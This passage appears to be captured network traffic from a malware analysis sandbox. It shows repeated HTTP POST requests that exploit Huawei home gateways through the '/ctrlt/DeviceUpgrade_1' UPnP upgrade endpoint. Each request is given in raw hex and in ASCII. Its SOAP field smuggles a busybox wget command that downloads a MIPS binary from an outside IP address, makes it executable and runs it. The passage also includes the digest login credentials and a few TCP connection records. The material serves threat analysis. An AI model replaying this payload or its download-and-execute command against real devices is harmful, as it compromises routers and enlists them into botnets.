xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:2643 -> 197.156.160.153:37215
